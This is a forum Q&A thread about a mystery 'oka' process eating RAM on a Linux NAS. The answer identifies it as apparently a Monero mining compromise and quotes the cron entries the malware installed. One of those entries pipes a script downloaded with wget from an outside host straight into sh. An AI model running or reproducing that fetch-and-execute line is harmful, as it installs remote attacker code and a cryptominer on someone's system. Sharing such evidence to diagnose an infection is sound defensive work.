# Process "oka" running high ram usage - Linux NAS - Asustor AS5202T

Tags: linux, process, nas

Does anyone know what the process "oka" is? I see it running on my nas every morning hogging the majority of the RAM on my device - about 1.5GB of my 2GB total. I reboot the device and it goes back to normal until the next day.

It seems to be a hard drive intensive task - as I can hear the hard drives thrashing quite a bit.

Comment: You should consider asking the supplier of your NAS; if you are adventurous and legally could do that, consider rewriting the entire linux distribution on your NAS

Comment: Yeah that's a good suggestion. I will do so.

Comment: You might use [strace(1)](http://man7.org/linux/man-pages/man1/man.1.html) to understand more what that process is doing

Comment: Okay I will give that a go

Comment: Looks like strace isn't available on the nas linux distro..whatever that is

Answer (score 0):

I have seen a similar file on my system, and appears to be related to a XMR mining hack

It self installed the following crons too

```bash
*/30 * * * * /home/postgres/var/lib/postgresql/14/main/./oka
* */6 * * * wget -q -O- http://xmr.linux1213.ru:2019/back.sh | sh
```